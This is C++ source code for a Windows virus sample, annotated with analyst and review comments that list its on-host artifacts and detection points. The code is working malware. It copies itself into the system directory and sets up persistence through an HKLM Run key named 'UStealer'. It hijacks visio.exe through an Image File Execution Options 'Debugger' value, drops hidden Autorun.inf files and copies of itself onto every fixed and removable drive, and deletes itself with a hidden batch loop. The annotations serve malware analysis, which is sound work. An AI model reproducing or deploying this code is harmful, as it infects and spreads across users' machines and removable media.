// OK-button handler: runs the four stages in order -- copy to the system
// directory, registry changes, Autorun.inf drops on every fixed/removable
// drive, then self-deletion. DeleteSelf() ends its normal path with
// exit(0), so nothing placed after it here would execute; it only returns
// (and this handler continues) when its batch file cannot be opened.
// Analyst note: the sequence below is the full on-host footprint of this
// sample; see the per-function headers for the exact file and registry
// artifacts each stage leaves.
void CHXVirusBody01Dlg::OnBnClickedOk()
{
// Copy to the system directory
CopySelf();
// Modify the registry
RegChange();
// Generate Autorun.inf files
Autorun();
// Self-delete
DeleteSelf();
}
// Hides the dialog window and copies the application into the system
// directory as "test.exe". CopyFile is called with bFailIfExists = TRUE,
// so an existing copy is left untouched, and its return value is not
// checked -- failure (e.g. no write access to the system directory for a
// non-elevated process) is silent.
// Analyst note: the file artifact is <GetSystemDirectory()>\test.exe; the
// copy source is AfxGetApp()->m_pszAppName exactly as written.
// Review note: GetSystemDirectory takes a buffer size in TCHARs, but it is
// passed sizeof(szSysPath), a byte count -- in a UNICODE build that
// over-reports the buffer length.
void CHXVirusBody01Dlg::CopySelf()
{
// Hide the window
this->ShowWindow(SW_HIDE);
TCHAR szSysPath[MAX_PATH] = { 0 };
GetSystemDirectory(szSysPath, sizeof(szSysPath));
CString strFileName = szSysPath;
strFileName += _T("\\test.exe");
// TRUE: do not overwrite an existing destination; result is discarded.
CopyFile(AfxGetApp()->m_pszAppName, strFileName.GetBuffer(), TRUE);
}
// Self-deletion via a helper batch file: writes "1.bat" (relative path, so
// it lands in the process's current working directory) containing a loop
// that retries "del /f /q <this exe path>" until the file is gone and then
// deletes the batch file itself ("del /f /q %0"), launches it hidden with
// ShellExecute, and terminates this process with exit(0). If 1.bat cannot
// be opened the function returns without launching anything.
// Analyst notes: the batch file is opened with std::ios::app, so repeated
// runs append to the same 1.bat rather than replacing it; at runtime this
// shows up as a hidden cmd.exe started from this image with the exe path
// embedded in the script. Self-delete-after-exit is a well-known pattern
// worth alerting on (a process spawning a batch file that deletes the
// parent image).
void CHXVirusBody01Dlg::DeleteSelf()
{
// Get this module's full path
char buf[MAX_PATH] = { 0 };
HMODULE hModel = NULL;
hModel = GetModuleHandle(0);
GetModuleFileNameA(hModel, buf, MAX_PATH);
// NOTE(review): closes a hard-coded handle value; what handle 4 refers to
// in this process is not determinable from this code -- confirm against
// the rest of the project.
CloseHandle((HANDLE)4);
// Generate the batch file
std::fstream fFile;
fFile.open(("1.bat"), std::ios::in | std::ios::out | std::ios::app);
if (!fFile.is_open())
{
return ;
}
// seekg() here receives the seekdir constant as an absolute position; with
// std::ios::app every write goes to the end of the file regardless.
fFile.seekg(std::ios::beg);
std::string str;
str = ("@echo off\r\n");
str += (":start\r\n\tif not exist ");
str += buf;
str += (" goto done\r\n");
str += ("\tdel /f /q ");
str += buf;
str += ("\r\n");
str += ("goto start\r\n");
str += (":done\r\n");
str += ("\tdel /f /q %0\r\n");
fFile << str << std::endl;
fFile.close();
// Run the batch file with a hidden window
ShellExecute(NULL, _T("open"), _T("1.bat"), NULL, NULL, SW_HIDE);
// Terminate so the batch file's delete loop can succeed on the image.
exit(0);
}
// Two registry writes under HKLM, both opened with KEY_ALL_ACCESS (which
// normally needs administrative rights; a non-elevated process fails the
// open/create and the block is skipped silently):
//  1. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value "UStealer"
//     = AfxGetApp()->m_pszAppName  (auto-start at logon).
//  2. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
//     Image File Execution Options\visio.exe, value "Debugger"
//     = AfxGetApp()->m_pszExeName  (IFEO "Debugger" redirection, so the
//     named program is launched through this value instead).
// Only the open/create result is checked; RegSetValueEx failures are
// ignored. Analyst note: these two value names/locations are the registry
// artifacts to monitor -- any write to the Run key or to an IFEO "Debugger"
// value is a standard persistence/hijack detection.
// Review note: both RegSetValueEx calls pass a length without the
// terminating NUL, and the lengths are character counts (lstrlen,
// CString::GetLength) where cbData expects bytes.
void CHXVirusBody01Dlg::RegChange()
{
// Add a startup entry
HKEY hKey = NULL;
DWORD rc;
char buffer[MAX_PATH] = { 0 };
rc = ::RegOpenKeyEx(HKEY_LOCAL_MACHINE,
_T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
0,
KEY_ALL_ACCESS,
&hKey);
if (ERROR_SUCCESS == rc)
{
// hx is assigned but never used below.
auto hx = AfxGetApp();
::RegSetValueEx(hKey, _T("UStealer"), 0, REG_SZ, (BYTE*)AfxGetApp()->m_pszAppName, lstrlen(AfxGetApp()->m_pszAppName));
RegCloseKey(hKey);
}
// Add an Image File Execution Options entry (hKey is reused for the new key)
DWORD dwDisposition = REG_CREATED_NEW_KEY;
if ((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
_T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\visio.exe"),
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS,
NULL,
&hKey,
&dwDisposition)) == ERROR_SUCCESS)
{
CString str = AfxGetApp()->m_pszExeName;
::RegSetValueEx(hKey, _T("Debugger"), 0, REG_SZ, (BYTE*)str.GetBuffer(), str.GetLength());
::RegCloseKey(hKey);
}
}
// Drive-root propagation: for each drive letter from 'C' up to (but not
// including) 'Z' whose GetDriveTypeA result is DRIVE_REMOVABLE or
// DRIVE_FIXED, writes "<X>:\Autorun.inf" pointing at test.exe, copies the
// application to "<X>:\test.exe", and sets FILE_ATTRIBUTE_HIDDEN on both.
// Analyst notes: the file artifacts are a hidden Autorun.inf and a hidden
// test.exe in the root of every matching drive (removable media included);
// modern Windows no longer runs Autorun.inf from removable media by
// default, so the Autorun.inf itself is mainly an indicator rather than an
// execution path. The CopyFile source is AfxGetApp()->m_pszExeName as
// written, and neither fopen nor CopyFile results are checked.
void CHXVirusBody01Dlg::Autorun()
{
char Disk = NULL;
UINT Type = 0;
FILE * fp;
char strFileName[MAX_PATH] = { 0 };
char szDriveName[4] = { 0 };
// Initialises szDriveName from the format string "C\\0", i.e. the three
// characters 'C', '\', '0'; only szDriveName[0] is changed by the loop.
wsprintfA(szDriveName, ("C\\0"));
// Iterate over all drive letters that might exist
for (szDriveName[0] = 'C'; szDriveName[0] < 'Z'; ++szDriveName[0])
{
// Query the drive type for this letter
Type = GetDriveTypeA(szDriveName);
if ((Type == DRIVE_REMOVABLE) || (Type == DRIVE_FIXED))
{
// Fixed partition or removable device: drop the files here
Disk = szDriveName[0];
sprintf_s(strFileName, ("%c:\\Autorun.inf"), Disk);
// Create Autorun.inf and write its contents (fp is used unchecked)
fp = fopen(strFileName, ("w+"));
fprintf_s(fp, ("[AutoRun]\n"));
fprintf_s(fp, ("OPEN=test.exe\n"));
fprintf_s(fp, ("SHELLEXECUTE=test.exe\n"));
fprintf_s(fp, ("shell\\Auto\\command=test.exe\n"));
fprintf_s(fp, ("shell=Auto"));
fclose(fp);
// Mark the file hidden
SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
// Copy into the root directory of this drive
sprintf_s(strFileName, ("%c:\\test.exe"), Disk);
CopyFile(AfxGetApp()->m_pszExeName, strFileName, TRUE);
// Mark the copy hidden
SetFileAttributesA(strFileName, FILE_ATTRIBUTE_HIDDEN);
}
}
}